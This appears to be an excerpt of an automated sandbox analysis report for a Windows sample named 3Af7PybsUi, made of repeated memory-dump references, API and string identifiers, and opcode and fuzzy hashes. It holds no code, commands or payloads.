                                                                                                                                  • Associated: 00000000.00000002.2237922240.00007FF7262CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2237922240.00007FF7262D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2238602757.00007FF7262D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff726290000_3Af7PybsUi.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Message$ErrorFormatLast
                                                                                                                                  • String ID: %ls%ls: %ls$<FormatMessageW failed.>$Error
                                                                                                                                  • API String ID: 3971115935-1149178304
                                                                                                                                  • Opcode ID: 0ded6d4e5eeb2df7dd6c32992adf891535d6bffb348d119068df09e90069f5ad
                                                                                                                                  • Instruction ID: 18a68f9366f7a052e9ba77b9640ed23285fdcd59f418d64b40f6b9e4ce376ecb
                                                                                                                                  • Opcode Fuzzy Hash: 0ded6d4e5eeb2df7dd6c32992adf891535d6bffb348d119068df09e90069f5ad
                                                                                                                                  • Instruction Fuzzy Hash: 36212572618A8582E720AB11FC507EBB3A4FB88785F800137EACD53A98DF7CD6558B50
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2237634577.00007FF726291000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF726290000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2237527321.00007FF726290000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2237788832.00007FF7262BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2237922240.00007FF7262CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2237922240.00007FF7262D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2238602757.00007FF7262D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff726290000_3Af7PybsUi.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1239891234-0
                                                                                                                                  • Opcode ID: f336cc4ee628281f12481126c86b188c106f14650002c00baa1860decbda2c10
                                                                                                                                  • Instruction ID: 27c198ab2768635de0f24666e91af90a35f6eead6b260c3ea2ce250e81f00d1d
                                                                                                                                  • Opcode Fuzzy Hash: f336cc4ee628281f12481126c86b188c106f14650002c00baa1860decbda2c10
                                                                                                                                  • Instruction Fuzzy Hash: CA315D32A18B818ADB609F25EC403AEB3E4FB89754F940136EA9D57B55DF38C545CB10
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2237634577.00007FF726291000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF726290000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2237527321.00007FF726290000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2237788832.00007FF7262BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2237922240.00007FF7262CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2237922240.00007FF7262D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2238602757.00007FF7262D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff726290000_3Af7PybsUi.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: FileFindFirst_invalid_parameter_noinfo
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2227656907-0
                                                                                                                                  • Opcode ID: fe4d16d24a501c342f9bdefd2dbf7b3c8df5536519bece05b709b84cd6c1ed58
                                                                                                                                  • Instruction ID: 1a391f585249415007b71f23ebeb36641b72bb091ebaaba6f917f2245bb9a1db
                                                                                                                                  • Opcode Fuzzy Hash: fe4d16d24a501c342f9bdefd2dbf7b3c8df5536519bece05b709b84cd6c1ed58
                                                                                                                                  • Instruction Fuzzy Hash: 88B18421B186D241EA62AB21AC107BFA3D1FB48BE4F845133EE5D17AD5DF7CE4418B20
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2237634577.00007FF726291000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF726290000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2237527321.00007FF726290000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2237788832.00007FF7262BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2237922240.00007FF7262CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2237922240.00007FF7262D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2238602757.00007FF7262D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff726290000_3Af7PybsUi.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2933794660-0
                                                                                                                                  • Opcode ID: 0f32e5fb6c1657f40c76225ea380b4ebd78bc5beffa0738dce661fe11625e8f4
                                                                                                                                  • Instruction ID: 1d3567de5a5190f9cf051dc237e78ec49e30a847fcd4f83e6e821dc6f0715b5f
                                                                                                                                  • Opcode Fuzzy Hash: 0f32e5fb6c1657f40c76225ea380b4ebd78bc5beffa0738dce661fe11625e8f4
                                                                                                                                  • Instruction Fuzzy Hash: BB112E22B14F058AEB00DF60EC542BA73A4FB59758F841E32DA6D46BA4DF7CD1948790
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2237634577.00007FF726291000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF726290000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2237527321.00007FF726290000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2237788832.00007FF7262BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2237922240.00007FF7262CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2237922240.00007FF7262D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2238602757.00007FF7262D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff726290000_3Af7PybsUi.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: memcpy_s
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1502251526-0
                                                                                                                                  • Opcode ID: b41cb84a548d2e61bdeb7bb10330278f5fecde395d7a0ce6ff99175555b28b3c
                                                                                                                                  • Instruction ID: 1e4f155129853cf999d220aab466c6a4689827548ed299af0bc8ebc40f962db8
                                                                                                                                  • Opcode Fuzzy Hash: b41cb84a548d2e61bdeb7bb10330278f5fecde395d7a0ce6ff99175555b28b3c
                                                                                                                                  • Instruction Fuzzy Hash: E9C1D272B1868687E7249F19A9447ABF7D1FB98B84F858136DB4A43744DF3DE801CB40
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2237634577.00007FF726291000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF726290000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2237527321.00007FF726290000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2237788832.00007FF7262BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2237922240.00007FF7262CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2237922240.00007FF7262D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2238602757.00007FF7262D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff726290000_3Af7PybsUi.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: $header crc mismatch$unknown header flags set
                                                                                                                                  • API String ID: 0-1127688429
                                                                                                                                  • Opcode ID: 6a55f11302ef793728786adf415505d571280719f8ef56880a9f0a37636d8ec0
                                                                                                                                  • Instruction ID: 919ca93382f3099342ed8ed0bfcf2259a0bbdaac6832684278b963000dc620a1
                                                                                                                                  • Opcode Fuzzy Hash: 6a55f11302ef793728786adf415505d571280719f8ef56880a9f0a37636d8ec0
                                                                                                                                  • Instruction Fuzzy Hash: ACF1E372E0A3C54BE795AB04CC88B3BBAE9FF84750F69453ADA4956390DB3CD640CB50
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2237634577.00007FF726291000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF726290000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2237527321.00007FF726290000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2237788832.00007FF7262BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2237922240.00007FF7262CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2237922240.00007FF7262D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2238602757.00007FF7262D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff726290000_3Af7PybsUi.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ExceptionRaise_clrfp
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 15204871-0
                                                                                                                                  • Opcode ID: 4367feba8b0fb5a89db2d79700bffb7903d016d74ce2a4ac284103265cf95646
                                                                                                                                  • Instruction ID: 6ea856cdc61c8daecfe067ffbdbb190340ca8be9f2d8568354b3cf6cf5927f33
                                                                                                                                  • Opcode Fuzzy Hash: 4367feba8b0fb5a89db2d79700bffb7903d016d74ce2a4ac284103265cf95646
                                                                                                                                  • Instruction Fuzzy Hash: 77B14A77604B898AEB19DF29CC46369BBE0F748B48F548922DB5D837A4CB3DD851CB10
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2237634577.00007FF726291000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF726290000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2237527321.00007FF726290000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2237788832.00007FF7262BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2237922240.00007FF7262CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2237922240.00007FF7262D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2238602757.00007FF7262D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff726290000_3Af7PybsUi.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: $
                                                                                                                                  • API String ID: 0-227171996
                                                                                                                                  • Opcode ID: 25965de2e6678be5c8c686b25b3b835ec4bf2bfab2b797158b347abdb642f747
                                                                                                                                  • Instruction ID: 514dfa0c74211e0029fbad2457dd7301ecda4af894df36dd0790dbfa7ab9cdef
                                                                                                                                  • Opcode Fuzzy Hash: 25965de2e6678be5c8c686b25b3b835ec4bf2bfab2b797158b347abdb642f747
                                                                                                                                  • Instruction Fuzzy Hash: 7DE1D93290964281EB68AE25CE9013EB3E0FF44B68FA85137DE4E47694DF79EC41CB50
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2237634577.00007FF726291000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF726290000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2237527321.00007FF726290000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2237788832.00007FF7262BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2237922240.00007FF7262CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2237922240.00007FF7262D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2238602757.00007FF7262D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff726290000_3Af7PybsUi.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: incorrect header check$invalid window size
                                                                                                                                  • API String ID: 0-900081337
                                                                                                                                  • Opcode ID: 226024973a440a2a6261c5f164d8bafa30541a105b972a390c392a8354fe07a0
                                                                                                                                  • Instruction ID: 0aeda82d58160c0bf1732b6b081b4a76faf9360ab72dd53be8483c374fdefacc
                                                                                                                                  • Opcode Fuzzy Hash: 226024973a440a2a6261c5f164d8bafa30541a105b972a390c392a8354fe07a0
                                                                                                                                  • Instruction Fuzzy Hash: 1A91B672A193C647E7A49B14CC58B3F7AE9FB84350F65413ADA4A567C0EB38E640CF50
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2237634577.00007FF726291000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF726290000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2237527321.00007FF726290000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2237788832.00007FF7262BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2237922240.00007FF7262CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2237922240.00007FF7262D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2238602757.00007FF7262D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff726290000_3Af7PybsUi.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: e+000$gfff
                                                                                                                                  • API String ID: 0-3030954782
                                                                                                                                  • Opcode ID: 1324d18368fb7be0dec1b44ace24e6b174879433860390047f5d35653063db2a
                                                                                                                                  • Instruction ID: 3f9f47d7ef69f8ee82f3edc69446f28e0f72551e0501cb3356b699eacc615204
                                                                                                                                  • Opcode Fuzzy Hash: 1324d18368fb7be0dec1b44ace24e6b174879433860390047f5d35653063db2a
                                                                                                                                  • Instruction Fuzzy Hash: 8D515A62F182C146E724DE359C007AAE7D1E745BA4F889632CB9847AC1CFBDD844CF10
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2237634577.00007FF726291000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF726290000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2237527321.00007FF726290000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2237788832.00007FF7262BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2237922240.00007FF7262CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2237922240.00007FF7262D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2238602757.00007FF7262D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff726290000_3Af7PybsUi.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CurrentFeaturePresentProcessProcessor
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1010374628-0
                                                                                                                                  • Opcode ID: a8238ebacfbb29389201daedac3868d1c225100c6328c8ae619a1fe2ce119bc6
                                                                                                                                  • Instruction ID: 9f0bca4f4724b5c265f8eba952784acf157e4b4c3b6edb010f64286f906f573f
                                                                                                                                  • Opcode Fuzzy Hash: a8238ebacfbb29389201daedac3868d1c225100c6328c8ae619a1fe2ce119bc6
                                                                                                                                  • Instruction Fuzzy Hash: 07026022E19A8240FA55FB169D012BBD6C1EF45BA0FD48637DE6D467D1DFBCE8018B20
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2237634577.00007FF726291000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF726290000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2237527321.00007FF726290000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2237788832.00007FF7262BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2237922240.00007FF7262CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2237922240.00007FF7262D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2238602757.00007FF7262D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff726290000_3Af7PybsUi.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: gfffffff
                                                                                                                                  • API String ID: 0-1523873471
                                                                                                                                  • Opcode ID: ee332c23296b8dd3ed29fdb42bef122adb490463d0c8b601810d73b835641fc7
                                                                                                                                  • Instruction ID: f2e1e676d32d916533e310dbf16e7c96b1a83ec05eb842def4989ca0793d87e7
                                                                                                                                  • Opcode Fuzzy Hash: ee332c23296b8dd3ed29fdb42bef122adb490463d0c8b601810d73b835641fc7
                                                                                                                                  • Instruction Fuzzy Hash: A2A14462B0878586EB21DB29AC007AABBD1EB54BA4F449033DE8D87781DF7DD901CB11
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2237634577.00007FF726291000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF726290000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2237527321.00007FF726290000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2237788832.00007FF7262BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2237922240.00007FF7262CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2237922240.00007FF7262D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2238602757.00007FF7262D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff726290000_3Af7PybsUi.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _invalid_parameter_noinfo
                                                                                                                                  • String ID: TMP
                                                                                                                                  • API String ID: 3215553584-3125297090
                                                                                                                                  • Opcode ID: dd4bbb8096afc2135879a6e6acc50949ef59d292da7f7bf8111e5166495e4f15
                                                                                                                                  • Instruction ID: ef337ec5d6fd5a9bc1cbda53162a608729dbfeac0cf4b0e225c563f6d7b0829c
                                                                                                                                  • Opcode Fuzzy Hash: dd4bbb8096afc2135879a6e6acc50949ef59d292da7f7bf8111e5166495e4f15
                                                                                                                                  • Instruction Fuzzy Hash: 9A51E319F0864241FA64BB265D201BBE2D2EF54BE4FC84536DE0D477D2EFBCE8014A28
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2237634577.00007FF726291000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF726290000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2237527321.00007FF726290000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2237788832.00007FF7262BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2237922240.00007FF7262CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2237922240.00007FF7262D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2238602757.00007FF7262D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff726290000_3Af7PybsUi.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: HeapProcess
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 54951025-0
                                                                                                                                  • Opcode ID: fe1a72d78314f5032ff6e3f3402ce84269ae1386cefa971ca0fc6f511f9bbc55
                                                                                                                                  • Instruction ID: f29901809b7af36fdb75420399a24265fdaeedba94711e25e15605d356c227b7
                                                                                                                                  • Opcode Fuzzy Hash: fe1a72d78314f5032ff6e3f3402ce84269ae1386cefa971ca0fc6f511f9bbc55
                                                                                                                                  • Instruction Fuzzy Hash: EAB09220E17A8AC6EA083B116C9A21562E8FF88701FE8803AC50C51320DF6C20A94B20
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2237634577.00007FF726291000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF726290000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2237527321.00007FF726290000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2237788832.00007FF7262BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2237922240.00007FF7262CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2237922240.00007FF7262D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2238602757.00007FF7262D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff726290000_3Af7PybsUi.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: b05403af9c31de739a9311cbf741df56ce5de8bb6a66a9cc9bcf40cf40427d0b
                                                                                                                                  • Instruction ID: 11b88d2e3a0ff8cf1567b189ea61d07df75f455381882fe8cbf9a88e3dcbb5a0
                                                                                                                                  • Opcode Fuzzy Hash: b05403af9c31de739a9311cbf741df56ce5de8bb6a66a9cc9bcf40cf40427d0b
                                                                                                                                  • Instruction Fuzzy Hash: A8D1EB2290964286E7789E258D9027FA3D1EB05B68FB84237CD0D476D5DFB9DC41CB60
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2237634577.00007FF726291000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF726290000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2237527321.00007FF726290000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2237788832.00007FF7262BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2237922240.00007FF7262CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2237922240.00007FF7262D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2238602757.00007FF7262D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff726290000_3Af7PybsUi.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: b6de572fc7ea0867e481f021e98a3cee959a95ba6dd1d6718a656c0f39a4e480
                                                                                                                                  • Instruction ID: b8b0835c470a002a7ea3f0856e2ccb23cad0e05e5e4caa2dbb7684f69a89aa9a
                                                                                                                                  • Opcode Fuzzy Hash: b6de572fc7ea0867e481f021e98a3cee959a95ba6dd1d6718a656c0f39a4e480
                                                                                                                                  • Instruction Fuzzy Hash: 05C1B3722142F14FD289FB29E85957A73E1F7D8309BD8402BEB8747B85CA3CA514DB60
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2237634577.00007FF726291000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF726290000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2237527321.00007FF726290000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2237788832.00007FF7262BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2237922240.00007FF7262CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2237922240.00007FF7262D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2238602757.00007FF7262D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff726290000_3Af7PybsUi.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 54646038064d7a6353eabae39e6447674b1691c16f4822fec46df2a19c6da082
                                                                                                                                  • Instruction ID: 00eae1bc6465e95cb1a6758bba0faed7819857bd03c7f57cc7c7b4436a0fe23f
                                                                                                                                  • Opcode Fuzzy Hash: 54646038064d7a6353eabae39e6447674b1691c16f4822fec46df2a19c6da082
                                                                                                                                  • Instruction Fuzzy Hash: 2CB1BE7291978585E7649F29CC9423EBBE0E745B68FA80136CB4E43795CFBAD841CB20
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2237634577.00007FF726291000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF726290000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2237527321.00007FF726290000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2237788832.00007FF7262BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2237922240.00007FF7262CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2237922240.00007FF7262D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2238602757.00007FF7262D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff726290000_3Af7PybsUi.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: c5cf27518f3756e107451e616d5c43acfc5497bdc9406be32d6656a2e3ee85f8
                                                                                                                                  • Instruction ID: 8ca1e98c7a54e87e03617f96a91444c2b307729b72925b7c524f056974d765e2
                                                                                                                                  • Opcode Fuzzy Hash: c5cf27518f3756e107451e616d5c43acfc5497bdc9406be32d6656a2e3ee85f8
                                                                                                                                  • Instruction Fuzzy Hash: 4381B172A0C78286E764EA199D4036BA6D1EB497A4F948A36DA8D43BD5CF7CD9008F10
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2237634577.00007FF726291000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF726290000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2237527321.00007FF726290000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2237788832.00007FF7262BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2237922240.00007FF7262CE000.00000004.00000001.01000000.00000003.sdmpDownload File
